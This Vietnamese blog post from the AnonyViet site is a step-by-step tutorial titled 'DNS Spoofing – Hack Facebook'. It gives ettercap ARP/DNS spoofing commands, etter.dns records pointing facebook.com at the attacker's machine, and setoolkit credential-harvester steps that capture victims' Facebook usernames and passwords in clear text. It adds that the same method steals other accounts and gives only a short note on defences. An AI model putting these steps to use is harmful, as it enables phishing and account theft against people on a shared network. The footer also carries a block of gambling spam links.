• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
  • Công cụ đổi số thành chữ
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

DNS Spoofing – Hack Facebook

AnonyViet by AnonyViet
15/12/2015 - Updated on 16/12/2020
in Facebook, Kali Linux / Parrot
A A
0

Mình xin nói sơ qua về DNS – Domain Name System – Hệ thống phân giải tên miền.

📢 Tham gia kênh Telegram của AnonyViet
👉 Vào Telegram AnonyViet
Cập nhật bài mới, tools hay và thủ thuật IT nhanh nhất

Khi bạn vào web browser gõ facebook.com thì hệ thống DNS sẽ phân giải cho bạn sang địa chỉ IP để bạn có thể giao tiếp, truyền tải dữ liệu trên mạng.

Các bài viết liên quan

cách kiếm tiền từ Facebook cá nhân

Hướng dẫn cách kiếm tiền từ Facebook cá nhân

02/05/2026
Cách thêm thanh trượt vào Facebook Stories để tua video dễ dàng 38

Cách thêm thanh trượt vào Facebook Stories để tua video dễ dàng

21/04/2026
cách gửi tin nhắn bí mật trên Facebook

Cách gửi tin nhắn bí mật trên Facebook bằng extension

19/03/2026
ung dung cau nguyen iran bi hack

Ứng dụng cầu nguyện của Iran bị hack, gửi thông điệp kêu gọi đầu hàng

01/03/2026

Bài này mình sẽ chia làm 2 phần:

Phần 1: Sử dụng ettercap để thực hiện DNS Spoofing

Phần 2: Sử dụng Setoolkit và Ettercap để thực hiện đánh cắp tài khoản facebook.

Thực hiện:

Phần 1: Sử dụng ettercap để thực hiện DNS Spoofing

Trước tiên, mình sẽ ping facebook.com xem thử địa chỉ IP tương ứng với tên miền facebook.com là gì

photo facebook_zpsf1b7f07c.jpg

Tiếp đến, vào Kali Linux thực hiện Enable IP Forwarding.

#echo 1 > /proc/sys/net/ipv4/ip_forward

photo ipforwarding_zps9e90c910.jpg

Tiếp theo sửa file etter.dns.

Sử dụng câu lệnh locate etter.dns xem hiện tại nó đang ở đâu. Xong thì tiến hành vào thêm các record sau:

facebook.com A 192.168.0.109

*.facebook.com A 192.168.0.109

Với địa chỉ 192.168.0.109 là IP máy Attacker.

photo etterdns_zps6db36b10.jpg

Note: Có thể nằm ở địa chỉ /usr/local/share/ettercap/etter.dns với các phiên bản Backtrack 5

Xong thì lưu lại và thoát :wq

photo facebook2_zpscdfe6288.jpg

Thực hiện dns spoofing bằng câu lệnh

#ettercap -T -q -M arp:remote -P dns_spoof //

photo ettercap_zpsac23a3f7.jpg

Sau đó vào máy client, cấp lại địa chỉ bằng câu lệnh >ipconfig /renew

photo ettercap3_zps6c7aa75f.jpg

Bây giờ lên PC client truy cập vào facebook.com bạn sẽ thấy nó vẫn truy cập bình thường. Nhưng khi tiến hành ping đến facebook.com thì IP trả lời lại là 192.168.0.109 – IP máy Attacker.

photo pingfacebook2_zps52486770.jpg

OK. Vậy là bạn đã thành công trong việc lái dữ liệu qua máy bạn, giờ chúng ta sẽ tiến hành đánh cắp tài khoản Facebook.

Phần 2: Sử dụng setoolkit và ettercap để thực hiện đánh cắp tài khoản facebook.

Công cụ sử dụng:

setoolkit: clone website, capture username/password

ettercap: Scan hosts + ARP poisoning (ARP spoofing) + DNS spoofing + Sniff (nghe lén).

Video demo: Youtube

Hướng dẫn bằng hình ảnh

Bật setoolkit

#/usr/share/set/setoolkit

DNS Spoofing - Hack Facebook 20

Đồng ý điều khoản sử dụng Bấm y -> Enter

photo setoolkit2_zps3d0fa4a2.jpg

Chọn 1) Social-Engineering Attacks

photo setoolkit3_zps2970c553.jpg

Chọn 2) Website Attack Ventors

DNS Spoofing - Hack Facebook 21

Chọn 3) Credential Harvester Attack Method

DNS Spoofing - Hack Facebook 22

Chọn 2) Site Cloner

DNS Spoofing - Hack Facebook 23

Đánh địa chỉ IP của Attacker: 192.168.0.109

DNS Spoofing - Hack Facebook 24

Đánh đường dẫn muốn clone website: https://www.facebook.com

DNS Spoofing - Hack Facebook 25

Xong thì bật Terminal khác, đánh ettercap -G để bật cấu hình ettercap bằng giao diện

Chọn Sniff-> Unified sniffing

DNS Spoofing - Hack Facebook 26

Chọn cổng để nghe lén: eth0

DNS Spoofing - Hack Facebook 27

Chọn Hosts-> Scan for hosts

Host-> Hosts List

DNS Spoofing - Hack Facebook 28

Chọn 2 địa chỉ để tiến hành nghe lén

DNS Spoofing - Hack Facebook 29

Thực hiện ARP possoning (ARP spoofing)

DNS Spoofing - Hack Facebook 30

Click chọn Sniff remote connections.

DNS Spoofing - Hack Facebook 31

Vào /etc/ettercap/etter.dns thêm vào 2 dòng:

facebook.com A 192.168.0.109

*.facebook.com A 192.168.0.109

DNS Spoofing - Hack Facebook 32

Vào Plugins-> Manage the plugins

DNS Spoofing - Hack Facebook 33

Click vào dns_spoof để bật tính năng này

DNS Spoofing - Hack Facebook 34

Start sniffing

DNS Spoofing - Hack Facebook 35

Tại máy client mở web browser vào facebook.com, điền username/password

DNS Spoofing - Hack Facebook 36

setoolkit sẽ bắt được username/password này

DNS Spoofing - Hack Facebook 37

Thông tin username/password hiện dưới dạng clear-text như trên, vậy là bạn đã có tài khoản facebook của client.

Cập nhật ngày 15/9/2015:

Ở phiên bản mới Kali 2.0, khi clone site về sẽ được lưu trong đường dẫn /var/www/ bạn tiến hành copy những file này vào đường dẫn /var/www/html sau đó tiến hành bình thường:

Note: nhớ change quyền để đọc và viết cho các file này:

#cd /var/www/html
#chmod 777 ./*

gồm 3 file là:
– index.html : giao diện của facebook.com
– post.php: hàm để lấy username/password khi bạn nhập vào và lưu ở file haverster_*.txt
– harvester_ngày_giờ.txt : lưu thông tin thu được.

photo clone1.png

Bằng cách tương tự các bạn có thể đánh cắp nhiều tài khoản khác.

Cách phòng chống DNS Spoofing:

Ngoài 2 cách ở bài ARP spoofing là triển khai port-security và DAI các bạn nên triển khai thêm DHCP snooping để ngăn chặn cấp DHCP giả mạo.

P/s: Như các bạn đã thấy, nếu attacker đã vào được trong mạng nội bộ của chúng ta mà có ý đồ đen tối thì có nhiều công cụ để khai khác thông tin của công ty mình. Như vậy, nếu nhân viên nào có ý đồ phá hoại công ty thì cũng khá vất vả để điều tra.

Nhân tiện đây, bạn nào có sử dụng công cụ hay chương trình giám sát nào bổ ích thì chia sẻ cho anh em biết với nhé.

Thân,

Tags: dnsFacebookhackkali linux
AnonyViet

AnonyViet

20 năm kinh nghiệm trong lĩnh vực Security, các chứng chỉ:OSCP, CCNA, CCNP, CISSP. Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

cách kiếm tiền từ Facebook cá nhân
Facebook

Hướng dẫn cách kiếm tiền từ Facebook cá nhân

02/05/2026
Cách thêm thanh trượt vào Facebook Stories để tua video dễ dàng 39
Facebook

Cách thêm thanh trượt vào Facebook Stories để tua video dễ dàng

21/04/2026
cách gửi tin nhắn bí mật trên Facebook
Phần mềm máy tính

Cách gửi tin nhắn bí mật trên Facebook bằng extension

19/03/2026
ung dung cau nguyen iran bi hack
Tin tức

Ứng dụng cầu nguyện của Iran bị hack, gửi thông điệp kêu gọi đầu hàng

01/03/2026
cách tìm lại video đã xem trên Facebook
Facebook

Cách tìm lại video đã xem trên Facebook

15/02/2026
Hướng dẫn cách tắt kỷ niệm trên Facebook chỉ trong 1 phút 40
Facebook

Hướng dẫn cách tắt kỷ niệm trên Facebook chỉ trong 1 phút

24/12/2025

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

code 1 tháng Super Duolingo

Share code 1 tháng Super Duolingo miễn phí

by Thanh Kim
15/07/2026
0

lái máy bay trên Google Earth

Hướng dẫn trải nghiệm lái máy bay trên Google Earth

by Thanh Kim
14/07/2026
0

cách tạo video review sản phẩm

Hướng dẫn cách tạo video review sản phẩm góc POV bằng Flow

by Thanh Kim
13/07/2026
0

Xiaomi Redmi A7 có phải là lựa chọn đáng giá trong phân khúc smartphone phổ thông? 3

Xiaomi Redmi A7 có phải là lựa chọn đáng giá trong phân khúc smartphone phổ thông?

by Lan Ngọc
12/07/2026 - Updated on 14/07/2026
0

Bình luận gần đây

  • Quach thi diem hang trong Hướng dẫn chế ảnh số dư tài khoản MB Bank
  • Thái trong Hướng dẫn cách nhận 200GB MultCloud miễn phí mới nhất 2026
  • hiupc trong Hướng dẫn cách nhận Google AI Pro 1 năm miễn phí cho tài khoản mới
  • Linh trong Cách hoàn thuế TNCN không cần chứng từ trên eTax Mobile
  • Phuong trong Share key bản quyền IObit Uninstaller 15 PRO miễn phí 2026
  • AnonyViet trong Share key Driver Booster 13 Pro miễn phí 2026
  • adasdav trong Share key Driver Booster 13 Pro miễn phí 2026
  • thanhlong trong EaseUS Data Recovery Wizard – khôi phục dữ liệu đã mất !
  • 45555 trong Trang web tra lịch thi đấu World Cup 2026 trực quan, đồng bộ lịch tự động
  • Dương HỒng Tỷ trong Cách sử dụng sách giáo khoa online miễn phí từ lớp 1 đến lớp 12
  • well trong Hướng dẫn cách nhận Google AI Pro 1 năm miễn phí cho tài khoản mới
  • sang trong Share key Driver Booster 13 Pro miễn phí 2026
  • Dung trong Cách Active Key Sublime Text 4 – Tải Sublime Text 4 Full Key
  • việt trong Hướng dẫn nhận Lovable Pro 12 tháng miễn phí
  • AnonyViet trong Cách tạo ảnh Tốt nghiệp mầm non cho bé đẹp như Studio
  • việt trong Cách tạo ảnh Tốt nghiệp mầm non cho bé đẹp như Studio
  • AnonyViet trong Tool gỡ key phần mềm lậu hàng loạt để tránh bị phạt
  • Aboyit trong Tool gỡ key phần mềm lậu hàng loạt để tránh bị phạt
  • iraq trong Share key Driver Booster 13 Pro miễn phí 2026
  • tu an trong Share key Driver Booster 13 Pro miễn phí 2026

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: support[@]anonyviet.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

kết quả xổ số hôm nay 33win Ae888 kubet 8kbet 99ok trang chủ sc88 xin88 good88 fm88 kubet thailand vip66 xoso66 https://tp88fun.com/ hello88 qq88 Vip66 hitclub bong99 XOSO66 new882.info Thabet fun88 nhà cái uy tín sunwin sunwin rikvip hitclub sunwin go88 12bet v9bet betvisa betvisa vin777 vin777 ee88 bet88 abc8 c54 https://keonhacai.fund/ sunwin Xoso66 58win fun88.supply https://fun88.supply/ F8BET80 u888 W88 link https://bbet88b.com/ OK9 vswin https://nowgoal.ws/ https://tylekeonhacai.me/ https://keonhacai.org.vc/ https://xx88.asia/ 789f NOHU HITCLUB Sunwin 58WIN MV88 888NEW AZ888 TD88 12bet v9bet vip66 7mcn hm88 DA88 9BET LC88 Game https://go8.red/ Go88 https://bancadoithuong.codes/ https://danhdeonline.blog/ Xocdia88 https://nhacaiuytin10.uk.com/ https://keonhacai88.tv/ https://keonhacai.loans/ https://gamebaidoithuong.io/ https://keonhacai.kiwi/ 789club Sun52 kjc nhà cái MB66 Thabet sun win luck8 https://devmarks.io V9bet Jun88 https://keonhacaitop.com/ hytw3339 Kết quả bóng đá xoso66 https://kjcgaming.com/ go88 F168 game nổ hũ tỷ lệ nhà cái https://sunwin.guru/ https://go88.baby/ https://hitclub.cab/ https://iwin.page/ https://b52.you/ https://789club-ceo.net/ https://manclub99.com/ https://choigamebai.org/ https://keonhacai95.com/ nổ hũ uy tín F168 https://kjcgaming.com/ 12bet 12bet nhà cái F168 8day https://gmnc.club/ vip88 99ok https://sunwinn.band/ keonhacai5 xx88 789club Jun88 888slot Hm88 TG88 TR88 AF88 58WIN JBO go88 Rikvip Bắn cá đổi thưởng Good88 https://zonic.sa.com/ Bong88 Game bài đổi thưởng Vn88 F 168 SH BET Xoilac TV bóng đá trực tiếp bóng đá trực tiếp cakhia tv trực tiếp bóng đá tối nay SKY88 Debet 12bet 12bet xoso66 Fun88 33win game bài kèo nhà cái F8bet RIK VIP https://sc88.info/ xx88 Rikvip https://sc88.market/ 8kbet https://vaoroitv.app/ https://mitomtv.me/ 7mcn rikvip sunwin https://keonhacai55.de/ https://keonhacai55.bet/ TẢI SUNWIN

©2026 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về CNTT

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2026 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về CNTT